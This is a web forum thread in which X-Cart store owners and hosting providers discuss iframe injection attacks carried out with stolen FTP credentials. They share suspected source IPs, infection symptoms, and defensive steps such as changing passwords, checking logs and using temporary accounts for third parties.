Warning: Iframe based attacks using stolen FTP access info
 

There seems to be a hacker out there (looks like they are from Egypt) targeting X-Cart sites with iframe based attacks. Basically they are gaining FTP access to a site and adding an iframe to existing index files, or adding new index files in all of the directories. The iframe loads a virus to anyone who accesses the site, both the admin side and the customer side. As you can imagine, this can be extremely damaging to your store if all of your customers get hit with this virus (particularly if they don't have anti-virus software). If you suddenly start to get a 'secure and insecure' warning in the admin, and see something loading other than your domain, close your browser immediately and contact your host.

The accounts that were hacked (the ones I know of) had FTP passwords that are just about impossible to hack, which means the account data was stolen/intercepted. Where it was stolen from is something myself and a few others are investigating as we speak.

In any event, now would be a VERY good time to change your FTP password, particularly if you have had work done on your site by anyone outside your organization. This can usually be done via your host's control panel.

You can also block these specific IP addresses which seem to be the source of some of the attacks (although these are probably just a proxy):

41.232.70.12
41.232.70.190
41.232.69.30
41.232.69.144

This is a serious threat, so please treat it as such - don't just dismiss this as 'it can't happen to me'.

Re: Warning: Iframe based attacks using stolen FTP access info
 

In my version (4.1.10) the following security measure is implemented in the config.php file.


Should this not stop the attack which you are talking about?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Na, that keeps X-Cart from being shown IN an Iframe, I don't think it prevents an iframe from being shown IN X-Cart...

Re: Warning: Iframe based attacks using stolen FTP access info
 

Re: Warning: Iframe based attacks using stolen FTP access info
 

I see. Were these hacks in the latest versions (4.1.10 & 4.1.11) of Xcart?

Re: Warning: Iframe based attacks using stolen FTP access info
 

I've seen the hacks in 4.0 sites and the latest 4.1 sites, with hackersafe and every security measure possible, including ftp p/ws of strength 100.

Re: Warning: Iframe based attacks using stolen FTP access info
 

That is not good. Hopefully someone can figure out how these clowns are getting the access info.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Wow, that's a serious comprimise....

Thanks for letting us know Padraic!

Re: Warning: Iframe based attacks using stolen FTP access info
 

Paul,

What I've seen are iframes loading a live-counter URL. Is that what you have seen as well?

photo,
This is not an x-cart vulnerability but FTP passwords are being leaked somewhere.

Re: Warning: Iframe based attacks using stolen FTP access info
 

How do you mean Emerson?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Is this issue possibly related to certain server control panels like Cpanel?

Re: Warning: Iframe based attacks using stolen FTP access info
 

photo,
It is a possibility but I am leaning more towards a source of logins have been breached.
We had 4 cases here and at first I thought maybe our system was compromised but after further investigation it was concluded that those logins were not available in our system.
So either a helpdesk somewhere has been hacked or e-mails are being interecepted somewhere.
Still investigating as we do not have much information to pinpoint the source of the problem and that is one of the reasons of this thread, so we can get as much information as possible.

We are instructing our customers to not give out their FTP logins to anyone, instead they should create a separate login and once the work is done they can delete that login.

Re: Warning: Iframe based attacks using stolen FTP access info
 

I would presume that the largest concentration of logins and passwords would be with X-Cart tech support. I hope that is not compromised. That would truly be a catastrophe.

Edit: Come to think of it, I'm guessing X-Cart recommended hosts would have quite a few number of ftp passwords too in their systems. We know that Emerson's safe so it would be great if the other companies can confirm their status too.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Yea, this is clearly not an X-Cart vulnerability - but pure information theft. Emerson's servers are locked up tight, so it has to be a leak somewhere.

Re: Warning: Iframe based attacks using stolen FTP access info
 

I got hit too. I am at Hands-On - so it seems not likely a vulnerability with the hosts.

I never give out the root ftp passwords, but have created ftp accounts for QT and various vendors - perhaps the compromise was there. My host is suggesting they may have intercepted email somehow. I did email ftp information to some vendors.

I saw the iframe edit in the main index file - am putting in a ticket to find all index files that were modified recently. (I don't have shell access - so I am having to look at directories one by one. So far - I have not found anything else.

Can anyone describe any other files or functionality that were modified? I'll be looking at all files that were changed today.

Re: Warning: Iframe based attacks using stolen FTP access info
 

It is basically every index.php file - if they aren't in a directory, they were created - so look for any index.php file created or edited on the day of the hack.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Hi gb2world.

Seems that iframes were injected in all index files.
Talk to Hands On and have them take a look at your FTP logs and see if this is related.

Actually you can look at the FTP logs yourself. They are found in the access-logs directory in your home directory.

Re: Warning: Iframe based attacks using stolen FTP access info
 

This is really bad. If they had full ftp access - They could also have picked up all the MYSQL password information. All that needs to be changed too. With access to the db - they can cause all sorts of mischief - and can have all customer information.

Re: Warning: Iframe based attacks using stolen FTP access info
 

We haven't had any reports of issues other than this one which we just received a ticket on.

I'm checking that server for issues currently, but the iFrame attacks really hadn't been present in over 2 years I think was the last time I've seen a rash of them.

Re: Warning: Iframe based attacks using stolen FTP access info
 

For example, watch for users modifying the database, changing your CC processing to manual and then changing the admin orders email address to theirs.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Nothing has been found on our servers at this time. We currently have an iframe scan in process on 67 of our ecommerce servers - so far, no results other than this one incident.

The only thing I can comment on at the moment is that if this was a normal iFrame attack then it could have been caused by a keylogger or something of that nature. There's a mini article on the iframe incidents located here: http://forums.cpanel.net/showthread.php?t=78595

The only other information I can contribute is that in the case of this one user the iframe linked to "live-counter.net" - again something that Emerson had mentioned previously. A scan of our servers for that combination in ANY user files has not shown to be present.

EDIT: I was just informed that the URL I posted goes to a forum that requires you to log in to view the posts. I have a shortened version of the post at our KB posted here: http://billing.handsonwebhosting.com/knowledgebase.php?action=displayarticle&catid=11&i d=220

Re: Warning: Iframe based attacks using stolen FTP access info
 

I went into my DirectAdmin panel. I changed my password in three locations:
1. DirectAdmin Account
2. Main FTP Account
3. Main Database Account

That locked users out of the site. Is that because I should not change the Main Database Account, and if so how would one change that properly?

Re: Warning: Iframe based attacks using stolen FTP access info
 

did you remember to change the database password in the config.php file?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Make sure to change the database password in your config.php file.

EDIT: beat me to it Conor :-)

Re: Warning: Iframe based attacks using stolen FTP access info
 

I was not even aware of it being there. New site and x-cart folks installed it. But I opened the file and see where to make the change.

How often should this be done?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Y'all can smile cause when I browsed to our site and was locked out I had that "What the F!!!!" response, and corresponding flushed feeling of fear.

Re: Warning: Iframe based attacks using stolen FTP access info
 

It's always a good thing to periodically change your passwords Donster. We deal with digital files so we rotate our passwords once a few weeks for added security.

Re: Warning: Iframe based attacks using stolen FTP access info
 

And as a general rule, if you are allowing a third party to access your site, create a temporary account for them and delete it when they are done.

Re: Warning: Iframe based attacks using stolen FTP access info
 

finerpeter :) I just got lucky on the refresh I guess :)

As for how often to change files - personally, every 90 days. All our servers get passwords changed every 90 days, as do most of the sites I visit. It's too easy to hack passwords (especially ones that a person would make), so use a random password generator to make the passwords. Most passwords for scripts or logins should have a minimum of 8 characters and for added security even 12 or 16.

Just to follow up further on this iFrame issue we have so far scanned 126 of our servers and have not had any other references to the live-counter site. All our servers are scanned by ScanAlert and ControlScan for PCI Compliance, and neither have detected intrusions through the server end of things, so this exploit through iFrame is very VERY odd.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Yes, Scanalert scans all our servers too and has not picked up anything.

The more I search the more bizare this whole thing looks.
I just finished scanning all 54 servers we have and It has only been a handful of sites affected. Very very odd indeed.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Guys,
One hour agao I updated our passwords and then had to post them in the X-Cart support desk as well because they are helping me with a support issue.

Just right now I started getting a warning for the following when I go to our Admin:
INTRUSION: HTTP Malicious Toolkit Variant Activity
INTRUDER: localhost(2596)
RISK LEVEL: HIGH
ATTACKED IP: live-counter.net(86.121.116.243)
ATTACKED PORT: http(80)

What a coincidence huh? If they are getting access through passwords, how did they have access to the site just now?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Yup, I just visited your site and my anti-virus is picking it up. You are infected.

Do you have access to the logs on the server?
can you look at the time stamp on the files to see when it was last changed?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Wow, that is scary.

Re: Warning: Iframe based attacks using stolen FTP access info
 

I don't know, I mean I'm checking the logs now to see what's going on.

Lowlife punks...

Re: Warning: Iframe based attacks using stolen FTP access info
 

We have one client so far having this same problem. Does anyone know what virus they are trying to spread so we can help make sure our client's personal computers are clean? We've already cleaned the server from what we can tell but she's worried about her computer as Norton never gave her a warning about a virus.

I'll post any more information if I have it. So far I don't really have much to add to the thread. But I agree with this client it looks like they got in via FTP and not via an X-cart security vulnerability even though they had the last 2 patches left to do which was in the schedule to do when they found this hack. But I found no evidence so far of them utilizing the security issues to get in. They just came directly in via FTP from what we're seeing so far.

Carrie

Re: Warning: Iframe based attacks using stolen FTP access info
 

This is what was blocked by Norton for me:

http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2005-042316-2917-99

Re: Warning: Iframe based attacks using stolen FTP access info
 

Carrie,

most likely is a keylogger that will then send the hackers further access to anything you type on your computer.

Re: Warning: Iframe based attacks using stolen FTP access info
 

All servers completed the tests here at Hands-on - no servers affected except for the one as listed by the client earlier in this thread.

I have pasted the contents of the file on a testing server and had ScanAlert and SecurityMatrix both run a test on the server - neither were picking up the iFrame insert. I am still waiting on HackerProof and ControlScan to finish their scans on the server.

Re: Warning: Iframe based attacks using stolen FTP access info
 

The wonderful people at my hosting company Finestshops.com were able to locate all the infected files and they also confirmed as Emerson said that it was through FTP access.

Carrie, you may want your client to run Ad-Aware too, that's what we're doing right now on all of our computers...

Re: Warning: Iframe based attacks using stolen FTP access info
 

This is really scary.

Has X-cart been notified of this potential breach?

Carrie